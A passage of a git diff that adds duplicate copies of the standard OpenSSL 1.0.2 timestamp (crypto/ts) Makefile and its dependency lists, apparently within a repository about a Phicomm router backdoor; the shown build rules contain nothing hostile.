+ts_rsp_utils.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_utils.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_utils.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_utils.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_utils.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_utils.c
+ts_rsp_verify.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_verify.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_verify.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_verify.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_verify.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_verify.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_verify.o: ../../include/openssl/obj_mac.h
+ts_rsp_verify.o: ../../include/openssl/objects.h
+ts_rsp_verify.o: ../../include/openssl/opensslconf.h
+ts_rsp_verify.o: ../../include/openssl/opensslv.h
+ts_rsp_verify.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_verify.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_verify.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_verify.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_verify.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_verify.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_verify.c
+ts_verify_ctx.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_verify_ctx.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_verify_ctx.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_verify_ctx.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_verify_ctx.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_verify_ctx.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_verify_ctx.o: ../../include/openssl/obj_mac.h
+ts_verify_ctx.o: ../../include/openssl/objects.h
+ts_verify_ctx.o: ../../include/openssl/opensslconf.h
+ts_verify_ctx.o: ../../include/openssl/opensslv.h
+ts_verify_ctx.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_verify_ctx.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_verify_ctx.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_verify_ctx.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_verify_ctx.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_verify_ctx.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_verify_ctx.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile.bak
new file mode 100644
index 0000000..86f9e60
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile.bak
@@ -0,0 +1,253 @@
+#
+# SSLeay/crypto/ts/Makefile
+#
+
+DIR=	ts
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I../../include
+CFLAG = -g
+INSTALL_PREFIX=
+OPENSSLDIR=     /usr/local/ssl
+INSTALLTOP=/usr/local/ssl
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=	Makefile
+AR=		ar r
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL= Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ts_err.c ts_req_utils.c ts_req_print.c ts_rsp_utils.c ts_rsp_print.c \
+	ts_rsp_sign.c ts_rsp_verify.c ts_verify_ctx.c ts_lib.c ts_conf.c \
+	ts_asn1.c
+LIBOBJ= ts_err.o ts_req_utils.o ts_req_print.o ts_rsp_utils.o ts_rsp_print.o \
+	ts_rsp_sign.o ts_rsp_verify.o ts_verify_ctx.o ts_lib.o ts_conf.o \
+	ts_asn1.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ts.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff enc dec sign verify
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ts_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ts_asn1.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_asn1.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_asn1.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_asn1.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_asn1.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_asn1.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_asn1.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_asn1.o: ../../include/openssl/x509v3.h ts_asn1.c
+ts_conf.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_conf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_conf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_conf.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_conf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_conf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_conf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_conf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_conf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+ts_conf.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+ts_conf.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_conf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_conf.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_conf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_conf.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_conf.c
+ts_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ts_err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_err.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_err.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ts_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ts_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+ts_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ts_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ts_err.o: ../../include/openssl/ts.h ../../include/openssl/x509.h
+ts_err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_err.o: ts_err.c
+ts_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ts_lib.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+ts_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_lib.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_lib.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ts_lib.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_lib.o: ../cryptlib.h ts.h ts_lib.c
+ts_req_print.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_req_print.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ts_req_print.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_req_print.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_req_print.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_req_print.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_req_print.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_req_print.o: ../../include/openssl/objects.h
+ts_req_print.o: ../../include/openssl/opensslconf.h
+ts_req_print.o: ../../include/openssl/opensslv.h
+ts_req_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_req_print.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_req_print.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_req_print.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_req_print.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_req_print.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_req_print.c
+ts_req_utils.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_req_utils.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_req_utils.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_req_utils.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_req_utils.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_req_utils.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_req_utils.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_req_utils.o: ../../include/openssl/opensslconf.h
+ts_req_utils.o: ../../include/openssl/opensslv.h
+ts_req_utils.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_req_utils.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_req_utils.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_req_utils.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_req_utils.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_req_utils.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_req_utils.c
+ts_rsp_print.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_print.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ts_rsp_print.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_rsp_print.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_rsp_print.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_rsp_print.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_rsp_print.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_rsp_print.o: ../../include/openssl/objects.h
+ts_rsp_print.o: ../../include/openssl/opensslconf.h
+ts_rsp_print.o: ../../include/openssl/opensslv.h
+ts_rsp_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_print.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_print.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_print.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ts_rsp_print.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_rsp_print.o: ../cryptlib.h ts.h ts_rsp_print.c
+ts_rsp_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_sign.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_sign.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_sign.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_rsp_sign.o: ../../include/openssl/opensslconf.h
+ts_rsp_sign.o: ../../include/openssl/opensslv.h
+ts_rsp_sign.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_sign.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_sign.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_sign.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_sign.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_sign.c
+ts_rsp_utils.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_utils.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_utils.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_utils.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_utils.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_utils.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_utils.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_rsp_utils.o: ../../include/openssl/opensslconf.h
+ts_rsp_utils.o: ../../include/openssl/opensslv.h
+ts_rsp_utils.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_utils.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_utils.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_utils.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_utils.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_utils.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_utils.c
+ts_rsp_verify.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_verify.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_verify.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_verify.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_verify.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_verify.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_verify.o: ../../include/openssl/obj_mac.h
+ts_rsp_verify.o: ../../include/openssl/objects.h
+ts_rsp_verify.o: ../../include/openssl/opensslconf.h
+ts_rsp_verify.o: ../../include/openssl/opensslv.h
+ts_rsp_verify.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_verify.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_verify.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_verify.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_verify.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_verify.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_verify.c
+ts_verify_ctx.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_verify_ctx.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_verify_ctx.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_verify_ctx.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_verify_ctx.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_verify_ctx.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_verify_ctx.o: ../../include/openssl/obj_mac.h
+ts_verify_ctx.o: ../../include/openssl/objects.h
+ts_verify_ctx.o: ../../include/openssl/opensslconf.h
+ts_verify_ctx.o: ../../include/openssl/opensslv.h
+ts_verify_ctx.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_verify_ctx.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_verify_ctx.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_verify_ctx.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_verify_ctx.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_verify_ctx.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_verify_ctx.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile.save
new file mode 100644
index 0000000..86f9e60
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile.save
@@ -0,0 +1,253 @@
+#
+# SSLeay/crypto/ts/Makefile
+#
+
+DIR=	ts
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I../../include
+CFLAG = -g
+INSTALL_PREFIX=
+OPENSSLDIR=     /usr/local/ssl
+INSTALLTOP=/usr/local/ssl
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=	Makefile
+AR=		ar r
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL= Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ts_err.c ts_req_utils.c ts_req_print.c ts_rsp_utils.c ts_rsp_print.c \
+	ts_rsp_sign.c ts_rsp_verify.c ts_verify_ctx.c ts_lib.c ts_conf.c \
+	ts_asn1.c
+LIBOBJ= ts_err.o ts_req_utils.o ts_req_print.o ts_rsp_utils.o ts_rsp_print.o \
+	ts_rsp_sign.o ts_rsp_verify.o ts_verify_ctx.o ts_lib.o ts_conf.o \
+	ts_asn1.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ts.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff enc dec sign verify
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ts_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ts_asn1.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_asn1.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_asn1.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_asn1.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_asn1.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_asn1.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_asn1.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_asn1.o: ../../include/openssl/x509v3.h ts_asn1.c
+ts_conf.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_conf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_conf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_conf.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_conf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_conf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_conf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_conf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_conf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+ts_conf.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+ts_conf.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_conf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_conf.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_conf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_conf.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_conf.c
+ts_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ts_err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_err.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_err.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ts_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ts_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+ts_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ts_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ts_err.o: ../../include/openssl/ts.h ../../include/openssl/x509.h
+ts_err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_err.o: ts_err.c
+ts_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ts_lib.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+ts_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_lib.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_lib.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ts_lib.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_lib.o: ../cryptlib.h ts.h ts_lib.c
+ts_req_print.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_req_print.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ts_req_print.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_req_print.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_req_print.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_req_print.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_req_print.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_req_print.o: ../../include/openssl/objects.h
+ts_req_print.o: ../../include/openssl/opensslconf.h
+ts_req_print.o: ../../include/openssl/opensslv.h
+ts_req_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_req_print.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_req_print.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_req_print.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_req_print.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_req_print.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_req_print.c
+ts_req_utils.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_req_utils.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_req_utils.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_req_utils.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_req_utils.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_req_utils.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_req_utils.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_req_utils.o: ../../include/openssl/opensslconf.h
+ts_req_utils.o: ../../include/openssl/opensslv.h
+ts_req_utils.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_req_utils.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_req_utils.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_req_utils.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_req_utils.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_req_utils.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_req_utils.c
+ts_rsp_print.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_print.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ts_rsp_print.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_rsp_print.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_rsp_print.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_rsp_print.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_rsp_print.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_rsp_print.o: ../../include/openssl/objects.h
+ts_rsp_print.o: ../../include/openssl/opensslconf.h
+ts_rsp_print.o: ../../include/openssl/opensslv.h
+ts_rsp_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_print.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_print.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_print.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ts_rsp_print.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_rsp_print.o: ../cryptlib.h ts.h ts_rsp_print.c
